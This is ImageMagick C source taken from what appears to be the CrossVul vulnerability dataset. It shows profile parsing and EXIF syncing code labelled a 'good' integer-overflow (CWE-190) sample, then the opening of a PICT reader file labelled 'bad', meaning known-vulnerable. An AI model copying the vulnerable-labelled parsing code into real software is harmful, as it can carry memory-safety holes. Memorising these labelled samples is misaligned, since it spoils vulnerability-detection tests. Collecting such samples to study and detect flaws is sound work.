if (transform == (cmsHTRANSFORM *) NULL)
ThrowProfileException(ImageError,"UnableToCreateColorTransform",
name);
/*
Transform image as dictated by the source & target image profiles.
*/
source_pixels=AcquirePixelThreadSet(image->columns,source_channels);
target_pixels=AcquirePixelThreadSet(image->columns,target_channels);
if ((source_pixels == (unsigned short **) NULL) ||
(target_pixels == (unsigned short **) NULL))
{
transform=DestroyTransformThreadSet(transform);
ThrowProfileException(ResourceLimitError,
"MemoryAllocationFailed",image->filename);
}
if (SetImageStorageClass(image,DirectClass,exception) == MagickFalse)
{
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
if (source_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(source_profile);
if (target_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(target_profile);
return(MagickFalse);
}
if (target_colorspace == CMYKColorspace)
(void) SetImageColorspace(image,target_colorspace,exception);
progress=0;
image_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static,4) shared(status) \
magick_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
MagickBooleanType
sync;
register ssize_t
x;
register Quantum
*magick_restrict q;
register unsigned short
*p;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,
exception);
if (q == (Quantum *) NULL)
{
status=MagickFalse;
continue;
}
p=source_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
{
*p++=ScaleQuantumToShort(GetPixelRed(image,q));
if (source_channels > 1)
{
*p++=ScaleQuantumToShort(GetPixelGreen(image,q));
*p++=ScaleQuantumToShort(GetPixelBlue(image,q));
}
if (source_channels > 3)
*p++=ScaleQuantumToShort(GetPixelBlack(image,q));
q+=GetPixelChannels(image);
}
cmsDoTransform(transform[id],source_pixels[id],target_pixels[id],
(unsigned int) image->columns);
p=target_pixels[id];
q-=GetPixelChannels(image)*image->columns;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (target_channels == 1)
SetPixelGray(image,ScaleShortToQuantum(*p),q);
else
SetPixelRed(image,ScaleShortToQuantum(*p),q);
p++;
if (target_channels > 1)
{
SetPixelGreen(image,ScaleShortToQuantum(*p),q);
p++;
SetPixelBlue(image,ScaleShortToQuantum(*p),q);
p++;
}
if (target_channels > 3)
{
SetPixelBlack(image,ScaleShortToQuantum(*p),q);
p++;
}
q+=GetPixelChannels(image);
}
sync=SyncCacheViewAuthenticPixels(image_view,exception);
if (sync == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp critical (MagickCore_ProfileImage)
#endif
proceed=SetImageProgress(image,ProfileImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
(void) SetImageColorspace(image,target_colorspace,exception);
switch (signature)
{
case cmsSigRgbData:
{
image->type=image->alpha_trait == UndefinedPixelTrait ?
TrueColorType : TrueColorAlphaType;
break;
}
case cmsSigCmykData:
{
image->type=image->alpha_trait == UndefinedPixelTrait ?
ColorSeparationType : ColorSeparationAlphaType;
break;
}
case cmsSigGrayData:
{
image->type=image->alpha_trait == UndefinedPixelTrait ?
GrayscaleType : GrayscaleAlphaType;
break;
}
default:
break;
}
target_pixels=DestroyPixelThreadSet(target_pixels);
source_pixels=DestroyPixelThreadSet(source_pixels);
transform=DestroyTransformThreadSet(transform);
if ((status != MagickFalse) &&
(cmsGetDeviceClass(source_profile) != cmsSigLinkClass))
status=SetImageProfile(image,name,profile,exception);
if (target_profile != (cmsHPROFILE) NULL)
(void) cmsCloseProfile(target_profile);
}
(void) cmsCloseProfile(source_profile);
}
#endif
}
profile=DestroyStringInfo(profile);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e m o v e I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RemoveImageProfile() removes a named profile from the image and returns its
% value.
%
% The format of the RemoveImageProfile method is:
%
% void *RemoveImageProfile(Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport StringInfo *RemoveImageProfile(Image *image,const char *name)
{
StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((StringInfo *) NULL);
WriteTo8BimProfile(image,name,(StringInfo *) NULL);
profile=(StringInfo *) RemoveNodeFromSplayTree((SplayTreeInfo *)
image->profiles,name);
return(profile);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% R e s e t P r o f i l e I t e r a t o r %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ResetImageProfileIterator() resets the image profile iterator. Use it in
% conjunction with GetNextImageProfile() to iterate over all the profiles
% associated with an image.
%
% The format of the ResetImageProfileIterator method is:
%
% ResetImageProfileIterator(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport void ResetImageProfileIterator(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return;
ResetSplayTreeIterator((SplayTreeInfo *) image->profiles);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S e t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SetImageProfile() adds a named profile to the image. If a profile with the
% same name already exists, it is replaced. This method differs from the
% ProfileImage() method in that it does not apply CMS color profiles.
%
% The format of the SetImageProfile method is:
%
% MagickBooleanType SetImageProfile(Image *image,const char *name,
% const StringInfo *profile)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name, for example icc, exif, and 8bim (8bim is the
% Photoshop wrapper for iptc profiles).
%
% o profile: A StringInfo structure that contains the named profile.
%
*/
static void *DestroyProfile(void *profile)
{
return((void *) DestroyStringInfo((StringInfo *) profile));
}
static inline const unsigned char *ReadResourceByte(const unsigned char *p,
unsigned char *quantum)
{
*quantum=(*p++);
return(p);
}
static inline const unsigned char *ReadResourceLong(const unsigned char *p,
unsigned int *quantum)
{
*quantum=(unsigned int) (*p++) << 24;
*quantum|=(unsigned int) (*p++) << 16;
*quantum|=(unsigned int) (*p++) << 8;
*quantum|=(unsigned int) (*p++) << 0;
return(p);
}
static inline const unsigned char *ReadResourceShort(const unsigned char *p,
unsigned short *quantum)
{
*quantum=(unsigned short) (*p++) << 8;
*quantum|=(unsigned short) (*p++);
return(p);
}
static inline void WriteResourceLong(unsigned char *p,
const unsigned int quantum)
{
unsigned char
buffer[4];
buffer[0]=(unsigned char) (quantum >> 24);
buffer[1]=(unsigned char) (quantum >> 16);
buffer[2]=(unsigned char) (quantum >> 8);
buffer[3]=(unsigned char) quantum;
(void) CopyMagickMemory(p,buffer,4);
}
static void WriteTo8BimProfile(Image *image,const char *name,
const StringInfo *profile)
{
const unsigned char
*datum,
*q;
register const unsigned char
*p;
size_t
length;
StringInfo
*profile_8bim;
ssize_t
count;
unsigned char
length_byte;
unsigned int
value;
unsigned short
id,
profile_id;
if (LocaleCompare(name,"icc") == 0)
profile_id=0x040f;
else
if (LocaleCompare(name,"iptc") == 0)
profile_id=0x0404;
else
if (LocaleCompare(name,"xmp") == 0)
profile_id=0x0424;
else
return;
profile_8bim=(StringInfo *) GetValueFromSplayTree((SplayTreeInfo *)
image->profiles,"8bim");
if (profile_8bim == (StringInfo *) NULL)
return;
datum=GetStringInfoDatum(profile_8bim);
length=GetStringInfoLength(profile_8bim);
for (p=datum; p < (datum+length-16); )
{
q=p;
if (LocaleNCompare((char *) p,"8BIM",4) != 0)
break;
p+=4;
p=ReadResourceShort(p,&id);
p=ReadResourceByte(p,&length_byte);
p+=length_byte;
if (((length_byte+1) & 0x01) != 0)
p++;
if (p > (datum+length-4))
break;
p=ReadResourceLong(p,&value);
count=(ssize_t) value;
if ((count & 0x01) != 0)
count++;
if ((count < 0) || (p > (datum+length-count)) ||
(count > (ssize_t) length))
break;
if (id != profile_id)
p+=count;
else
{
size_t
extent,
offset;
ssize_t
extract_count;
StringInfo
*extract_profile;
extract_count=0;
extent=(datum+length)-(p+count);
if (profile == (StringInfo *) NULL)
{
offset=(q-datum);
extract_profile=AcquireStringInfo(offset+extent);
(void) CopyMagickMemory(extract_profile->datum,datum,offset);
}
else
{
offset=(p-datum);
extract_count=profile->length;
if ((extract_count & 0x01) != 0)
extract_count++;
extract_profile=AcquireStringInfo(offset+extract_count+extent);
(void) CopyMagickMemory(extract_profile->datum,datum,offset-4);
WriteResourceLong(extract_profile->datum+offset-4,
(unsigned int)profile->length);
(void) CopyMagickMemory(extract_profile->datum+offset,
profile->datum,profile->length);
}
(void) CopyMagickMemory(extract_profile->datum+offset+extract_count,
p+count,extent);
(void) AddValueToSplayTree((SplayTreeInfo *) image->profiles,
ConstantString("8bim"),CloneStringInfo(extract_profile));
extract_profile=DestroyStringInfo(extract_profile);
break;
}
}
}
static void GetProfilesFromResourceBlock(Image *image,
const StringInfo *resource_block,ExceptionInfo *exception)
{
const unsigned char
*datum;
register const unsigned char
*p;
size_t
length;
ssize_t
count;
StringInfo
*profile;
unsigned char
length_byte;
unsigned int
value;
unsigned short
id;
datum=GetStringInfoDatum(resource_block);
length=GetStringInfoLength(resource_block);
for (p=datum; p < (datum+length-16); )
{
if (LocaleNCompare((char *) p,"8BIM",4) != 0)
break;
p+=4;
p=ReadResourceShort(p,&id);
p=ReadResourceByte(p,&length_byte);
p+=length_byte;
if (((length_byte+1) & 0x01) != 0)
p++;
if (p > (datum+length-4))
break;
p=ReadResourceLong(p,&value);
count=(ssize_t) value;
if ((p > (datum+length-count)) || (count > (ssize_t) length) ||
(count < 0))
break;
switch (id)
{
case 0x03ed:
{
unsigned int
resolution;
unsigned short
units;
/*
Resolution.
*/
p=ReadResourceLong(p,&resolution);
image->resolution.x=((double) resolution)/65536.0;
p=ReadResourceShort(p,&units)+2;
p=ReadResourceLong(p,&resolution)+4;
image->resolution.y=((double) resolution)/65536.0;
/*
Values are always stored as pixels per inch.
*/
if ((ResolutionType) units != PixelsPerCentimeterResolution)
image->units=PixelsPerInchResolution;
else
{
image->units=PixelsPerCentimeterResolution;
image->resolution.x/=2.54;
image->resolution.y/=2.54;
}
break;
}
case 0x0404:
{
/*
IPTC Profile
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"iptc",profile,MagickTrue,
exception);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x040c:
{
/*
Thumbnail.
*/
p+=count;
break;
}
case 0x040f:
{
/*
ICC Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"icc",profile,MagickTrue,
exception);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x0422:
{
/*
EXIF Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"exif",profile,MagickTrue,
exception);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
case 0x0424:
{
/*
XMP Profile.
*/
profile=AcquireStringInfo(count);
SetStringInfoDatum(profile,p);
(void) SetImageProfileInternal(image,"xmp",profile,MagickTrue,
exception);
profile=DestroyStringInfo(profile);
p+=count;
break;
}
default:
{
p+=count;
break;
}
}
if ((count & 0x01) != 0)
p++;
}
}
static MagickBooleanType SetImageProfileInternal(Image *image,const char *name,
const StringInfo *profile,const MagickBooleanType recursive,
ExceptionInfo *exception)
{
char
key[MagickPathExtent],
property[MagickPathExtent];
MagickBooleanType
status;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
image->profiles=NewSplayTree(CompareSplayTreeString,RelinquishMagickMemory,
DestroyProfile);
(void) CopyMagickString(key,name,MagickPathExtent);
LocaleLower(key);
status=AddValueToSplayTree((SplayTreeInfo *) image->profiles,
ConstantString(key),CloneStringInfo(profile));
if (status != MagickFalse)
{
if (LocaleCompare(name,"8bim") == 0)
GetProfilesFromResourceBlock(image,profile,exception);
else if (recursive == MagickFalse)
WriteTo8BimProfile(image,name,profile);
}
/*
Inject profile into image properties.
*/
(void) FormatLocaleString(property,MagickPathExtent,"%s:*",name);
(void) GetImageProperty(image,property,exception);
return(status);
}
MagickExport MagickBooleanType SetImageProfile(Image *image,const char *name,
const StringInfo *profile,ExceptionInfo *exception)
{
return(SetImageProfileInternal(image,name,profile,MagickFalse,exception));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S y n c I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SyncImageProfiles() synchronizes image properties with the image profiles.
% Currently we only support updating the EXIF resolution and orientation.
%
% The format of the SyncImageProfiles method is:
%
% MagickBooleanType SyncImageProfiles(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
static inline int ReadProfileByte(unsigned char **p,size_t *length)
{
int
c;
if (*length < 1)
return(EOF);
c=(int) (*(*p)++);
(*length)--;
return(c);
}
static inline signed short ReadProfileShort(const EndianType endian,
unsigned char *buffer)
{
union
{
unsigned int
unsigned_value;
signed int
signed_value;
} quantum;
unsigned short
value;
if (endian == LSBEndian)
{
value=(unsigned short) buffer[1] << 8;
value|=(unsigned short) buffer[0];
quantum.unsigned_value=value & 0xffff;
return(quantum.signed_value);
}
value=(unsigned short) buffer[0] << 8;
value|=(unsigned short) buffer[1];
quantum.unsigned_value=value & 0xffff;
return(quantum.signed_value);
}
static inline signed int ReadProfileLong(const EndianType endian,
unsigned char *buffer)
{
union
{
unsigned int
unsigned_value;
signed int
signed_value;
} quantum;
unsigned int
value;
if (endian == LSBEndian)
{
value=(unsigned int) buffer[3] << 24;
value|=(unsigned int) buffer[2] << 16;
value|=(unsigned int) buffer[1] << 8;
value|=(unsigned int) buffer[0];
quantum.unsigned_value=value & 0xffffffff;
return(quantum.signed_value);
}
value=(unsigned int) buffer[0] << 24;
value|=(unsigned int) buffer[1] << 16;
value|=(unsigned int) buffer[2] << 8;
value|=(unsigned int) buffer[3];
quantum.unsigned_value=value & 0xffffffff;
return(quantum.signed_value);
}
static inline signed int ReadProfileMSBLong(unsigned char **p,size_t *length)
{
signed int
value;
if (*length < 4)
return(0);
value=ReadProfileLong(MSBEndian,*p);
(*length)-=4;
*p+=4;
return(value);
}
static inline signed short ReadProfileMSBShort(unsigned char **p,
size_t *length)
{
signed short
value;
if (*length < 2)
return(0);
value=ReadProfileShort(MSBEndian,*p);
(*length)-=2;
*p+=2;
return(value);
}
static inline void WriteProfileLong(const EndianType endian,
const size_t value,unsigned char *p)
{
unsigned char
buffer[4];
if (endian == LSBEndian)
{
buffer[0]=(unsigned char) value;
buffer[1]=(unsigned char) (value >> 8);
buffer[2]=(unsigned char) (value >> 16);
buffer[3]=(unsigned char) (value >> 24);
(void) CopyMagickMemory(p,buffer,4);
return;
}
buffer[0]=(unsigned char) (value >> 24);
buffer[1]=(unsigned char) (value >> 16);
buffer[2]=(unsigned char) (value >> 8);
buffer[3]=(unsigned char) value;
(void) CopyMagickMemory(p,buffer,4);
}
static void WriteProfileShort(const EndianType endian,
const unsigned short value,unsigned char *p)
{
unsigned char
buffer[2];
if (endian == LSBEndian)
{
buffer[0]=(unsigned char) value;
buffer[1]=(unsigned char) (value >> 8);
(void) CopyMagickMemory(p,buffer,2);
return;
}
buffer[0]=(unsigned char) (value >> 8);
buffer[1]=(unsigned char) value;
(void) CopyMagickMemory(p,buffer,2);
}
static MagickBooleanType Sync8BimProfile(Image *image,StringInfo *profile)
{
size_t
length;
ssize_t
count;
unsigned char
*p;
unsigned short
id;
length=GetStringInfoLength(profile);
p=GetStringInfoDatum(profile);
while (length != 0)
{
if (ReadProfileByte(&p,&length) != 0x38)
continue;
if (ReadProfileByte(&p,&length) != 0x42)
continue;
if (ReadProfileByte(&p,&length) != 0x49)
continue;
if (ReadProfileByte(&p,&length) != 0x4D)
continue;
if (length < 7)
return(MagickFalse);
id=ReadProfileMSBShort(&p,&length);
count=(ssize_t) ReadProfileByte(&p,&length);
if ((count > (ssize_t) length) || (count < 0))
return(MagickFalse);
p+=count;
if ((*p & 0x01) == 0)
(void) ReadProfileByte(&p,&length);
count=(ssize_t) ReadProfileMSBLong(&p,&length);
if ((count > (ssize_t) length) || (count < 0))
return(MagickFalse);
if ((id == 0x3ED) && (count == 16))
{
if (image->units == PixelsPerCentimeterResolution)
WriteProfileLong(MSBEndian, (unsigned int) (image->resolution.x*2.54*
65536.0),p);
else
WriteProfileLong(MSBEndian, (unsigned int) (image->resolution.x*
65536.0),p);
WriteProfileShort(MSBEndian,(unsigned short) image->units,p+4);
if (image->units == PixelsPerCentimeterResolution)
WriteProfileLong(MSBEndian, (unsigned int) (image->resolution.y*2.54*
65536.0),p+8);
else
WriteProfileLong(MSBEndian, (unsigned int) (image->resolution.y*
65536.0),p+8);
WriteProfileShort(MSBEndian,(unsigned short) image->units,p+12);
}
p+=count;
length-=count;
}
return(MagickTrue);
}
MagickBooleanType SyncExifProfile(Image *image,StringInfo *profile)
{
#define MaxDirectoryStack 16
#define EXIF_DELIMITER "\n"
#define EXIF_NUM_FORMATS 12
#define TAG_EXIF_OFFSET 0x8769
#define TAG_INTEROP_OFFSET 0xa005
typedef struct _DirectoryInfo
{
unsigned char
*directory;
size_t
entry;
} DirectoryInfo;
DirectoryInfo
directory_stack[MaxDirectoryStack];
EndianType
endian;
size_t
entry,
length,
number_entries;
ssize_t
id,
level,
offset;
static int
format_bytes[] = {0, 1, 1, 2, 4, 8, 1, 1, 2, 4, 8, 4, 8};
unsigned char
*directory,
*exif;
/*
Set EXIF resolution tag.
*/
length=GetStringInfoLength(profile);
exif=GetStringInfoDatum(profile);
if (length < 16)
return(MagickFalse);
id=(ssize_t) ReadProfileShort(LSBEndian,exif);
if ((id != 0x4949) && (id != 0x4D4D))
{
while (length != 0)
{
if (ReadProfileByte(&exif,&length) != 0x45)
continue;
if (ReadProfileByte(&exif,&length) != 0x78)
continue;
if (ReadProfileByte(&exif,&length) != 0x69)
continue;
if (ReadProfileByte(&exif,&length) != 0x66)
continue;
if (ReadProfileByte(&exif,&length) != 0x00)
continue;
if (ReadProfileByte(&exif,&length) != 0x00)
continue;
break;
}
if (length < 16)
return(MagickFalse);
id=(ssize_t) ReadProfileShort(LSBEndian,exif);
}
endian=LSBEndian;
if (id == 0x4949)
endian=LSBEndian;
else
if (id == 0x4D4D)
endian=MSBEndian;
else
return(MagickFalse);
if (ReadProfileShort(endian,exif+2) != 0x002a)
return(MagickFalse);
/*
This the offset to the first IFD.
*/
offset=(ssize_t) ReadProfileLong(endian,exif+4);
if ((offset < 0) || (size_t) offset >= length)
return(MagickFalse);
directory=exif+offset;
level=0;
entry=0;
do
{
if (level > 0)
{
level--;
directory=directory_stack[level].directory;
entry=directory_stack[level].entry;
}
if ((directory < exif) || (directory > (exif+length-2)))
break;
/*
Determine how many entries there are in the current IFD.
*/
number_entries=ReadProfileShort(endian,directory);
for ( ; entry < number_entries; entry++)
{
int
components;
register unsigned char
*p,
*q;
size_t
number_bytes;
ssize_t
format,
tag_value;
q=(unsigned char *) (directory+2+(12*entry));
if (q > (exif+length-12))
break; /* corrupt EXIF */
tag_value=(ssize_t) ReadProfileShort(endian,q);
format=(ssize_t) ReadProfileShort(endian,q+2);
if ((format-1) >= EXIF_NUM_FORMATS)
break;
components=(ssize_t) ReadProfileLong(endian,q+4);
if (components < 0)
break; /* corrupt EXIF */
number_bytes=(size_t) components*format_bytes[format];
if ((ssize_t) number_bytes < components)
break; /* prevent overflow */
if (number_bytes <= 4)
p=q+8;
else
{
/*
The directory entry contains an offset.
*/
offset=(ssize_t) ReadProfileLong(endian,q+8);
if ((size_t) (offset+number_bytes) > length)
continue;
if (~length < number_bytes)
continue; /* prevent overflow */
p=(unsigned char *) (exif+offset);
}
switch (tag_value)
{
case 0x011a:
{
(void) WriteProfileLong(endian,(size_t) (image->resolution.x+0.5),p);
(void) WriteProfileLong(endian,1UL,p+4);
break;
}
case 0x011b:
{
(void) WriteProfileLong(endian,(size_t) (image->resolution.y+0.5),p);
(void) WriteProfileLong(endian,1UL,p+4);
break;
}
case 0x0112:
{
if (number_bytes == 4)
{
(void) WriteProfileLong(endian,(size_t) image->orientation,p);
break;
}
(void) WriteProfileShort(endian,(unsigned short) image->orientation,
p);
break;
}
case 0x0128:
{
if (number_bytes == 4)
{
(void) WriteProfileLong(endian,(size_t) (image->units+1),p);
break;
}
(void) WriteProfileShort(endian,(unsigned short) (image->units+1),p);
break;
}
default:
break;
}
if ((tag_value == TAG_EXIF_OFFSET) || (tag_value == TAG_INTEROP_OFFSET))
{
offset=(ssize_t) ReadProfileLong(endian,p);
if (((size_t) offset < length) && (level < (MaxDirectoryStack-2)))
{
directory_stack[level].directory=directory;
entry++;
directory_stack[level].entry=entry;
level++;
directory_stack[level].directory=exif+offset;
directory_stack[level].entry=0;
level++;
if ((directory+2+(12*number_entries)) > (exif+length))
break;
offset=(ssize_t) ReadProfileLong(endian,directory+2+(12*
number_entries));
if ((offset != 0) && ((size_t) offset < length) &&
(level < (MaxDirectoryStack-2)))
{
directory_stack[level].directory=exif+offset;
directory_stack[level].entry=0;
level++;
}
}
break;
}
}
} while (level > 0);
return(MagickTrue);
}
MagickPrivate MagickBooleanType SyncImageProfiles(Image *image)
{
MagickBooleanType
status;
StringInfo
*profile;
status=MagickTrue;
profile=(StringInfo *) GetImageProfile(image,"8BIM");
if (profile != (StringInfo *) NULL)
if (Sync8BimProfile(image,profile) == MagickFalse)
status=MagickFalse;
profile=(StringInfo *) GetImageProfile(image,"EXIF");
if (profile != (StringInfo *) NULL)
if (SyncExifProfile(image,profile) == MagickFalse)
status=MagickFalse;
return(status);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5177_0 |
crossvul-cpp_data_bad_1834_6 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% PPPP IIIII CCCC TTTTT %
% P P I C T %
% PPPP I C T %
% P I C T %
% P IIIII CCCC T %
% %
% %
% Read/Write Apple Macintosh QuickDraw/PICT Format %
% %
% Software Design %
% Cristy %
% July 1992 %
% %
% %
% Copyright 1999-2015 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/blob.h"
#include "MagickCore/blob-private.h"
#include "MagickCore/cache.h"
#include "MagickCore/color-private.h"
#include "MagickCore/colormap.h"
#include "MagickCore/colormap-private.h"
#include "MagickCore/colorspace.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/composite.h"
#include "MagickCore/constitute.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/list.h"
#include "MagickCore/log.h"
#include "MagickCore/magick.h"
#include "MagickCore/memory_.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/profile.h"
#include "MagickCore/resource_.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/static.h"
#include "MagickCore/string_.h"
#include "MagickCore/module.h"
#include "MagickCore/transform.h"
#include "MagickCore/utility.h"
/*
ImageMagick Macintosh PICT Methods.
*/
#define ReadPixmap(pixmap) \
{ \
pixmap.version=(short) ReadBlobMSBShort(image); \
pixmap.pack_type=(short) ReadBlobMSBShort(image); \
pixmap.pack_size=ReadBlobMSBLong(image); \
pixmap.horizontal_resolution=1UL*ReadBlobMSBShort(image); \
(void) ReadBlobMSBShort(image); \
pixmap.vertical_resolution=1UL*ReadBlobMSBShort(image); \
(void) ReadBlobMSBShort(image); \
pixmap.pixel_type=(short) ReadBlobMSBShort(image); \
pixmap.bits_per_pixel=(short) ReadBlobMSBShort(image); \
pixmap.component_count=(short) ReadBlobMSBShort(image); \
pixmap.component_size=(short) ReadBlobMSBShort(image); \
pixmap.plane_bytes=ReadBlobMSBLong(image); \
pixmap.table=ReadBlobMSBLong(image); \
pixmap.reserved=ReadBlobMSBLong(image); \
if ((EOFBlob(image) != MagickFalse) || (pixmap.bits_per_pixel <= 0) || \
(pixmap.bits_per_pixel > 32) || (pixmap.component_count <= 0) || \
(pixmap.component_count > 4) || (pixmap.component_size <= 0)) \
ThrowReaderException(CorruptImageError,"ImproperImageHeader"); \
}
typedef struct _PICTCode
{
const char
*name;
ssize_t
length;
const char
*description;
} PICTCode;
typedef struct _PICTPixmap
{
short
version,
pack_type;
size_t
pack_size,
horizontal_resolution,
vertical_resolution;
short
pixel_type,
bits_per_pixel,
component_count,
component_size;
size_t
plane_bytes,
table,
reserved;
} PICTPixmap;
typedef struct _PICTRectangle
{
short
top,
left,
bottom,
right;
} PICTRectangle;
static const PICTCode
codes[] =
{
/* 0x00 */ { "NOP", 0, "nop" },
/* 0x01 */ { "Clip", 0, "clip" },
/* 0x02 */ { "BkPat", 8, "background pattern" },
/* 0x03 */ { "TxFont", 2, "text font (word)" },
/* 0x04 */ { "TxFace", 1, "text face (byte)" },
/* 0x05 */ { "TxMode", 2, "text mode (word)" },
/* 0x06 */ { "SpExtra", 4, "space extra (fixed point)" },
/* 0x07 */ { "PnSize", 4, "pen size (point)" },
/* 0x08 */ { "PnMode", 2, "pen mode (word)" },
/* 0x09 */ { "PnPat", 8, "pen pattern" },
/* 0x0a */ { "FillPat", 8, "fill pattern" },
/* 0x0b */ { "OvSize", 4, "oval size (point)" },
/* 0x0c */ { "Origin", 4, "dh, dv (word)" },
/* 0x0d */ { "TxSize", 2, "text size (word)" },
/* 0x0e */ { "FgColor", 4, "foreground color (ssize_tword)" },
/* 0x0f */ { "BkColor", 4, "background color (ssize_tword)" },
/* 0x10 */ { "TxRatio", 8, "numerator (point), denominator (point)" },
/* 0x11 */ { "Version", 1, "version (byte)" },
/* 0x12 */ { "BkPixPat", 0, "color background pattern" },
/* 0x13 */ { "PnPixPat", 0, "color pen pattern" },
/* 0x14 */ { "FillPixPat", 0, "color fill pattern" },
/* 0x15 */ { "PnLocHFrac", 2, "fractional pen position" },
/* 0x16 */ { "ChExtra", 2, "extra for each character" },
/* 0x17 */ { "reserved", 0, "reserved for Apple use" },
/* 0x18 */ { "reserved", 0, "reserved for Apple use" },
/* 0x19 */ { "reserved", 0, "reserved for Apple use" },
/* 0x1a */ { "RGBFgCol", 6, "RGB foreColor" },
/* 0x1b */ { "RGBBkCol", 6, "RGB backColor" },
/* 0x1c */ { "HiliteMode", 0, "hilite mode flag" },
/* 0x1d */ { "HiliteColor", 6, "RGB hilite color" },
/* 0x1e */ { "DefHilite", 0, "Use default hilite color" },
/* 0x1f */ { "OpColor", 6, "RGB OpColor for arithmetic modes" },
/* 0x20 */ { "Line", 8, "pnLoc (point), newPt (point)" },
/* 0x21 */ { "LineFrom", 4, "newPt (point)" },
/* 0x22 */ { "ShortLine", 6, "pnLoc (point, dh, dv (-128 .. 127))" },
/* 0x23 */ { "ShortLineFrom", 2, "dh, dv (-128 .. 127)" },
/* 0x24 */ { "reserved", -1, "reserved for Apple use" },
/* 0x25 */ { "reserved", -1, "reserved for Apple use" },
/* 0x26 */ { "reserved", -1, "reserved for Apple use" },
/* 0x27 */ { "reserved", -1, "reserved for Apple use" },
/* 0x28 */ { "LongText", 0, "txLoc (point), count (0..255), text" },
/* 0x29 */ { "DHText", 0, "dh (0..255), count (0..255), text" },
/* 0x2a */ { "DVText", 0, "dv (0..255), count (0..255), text" },
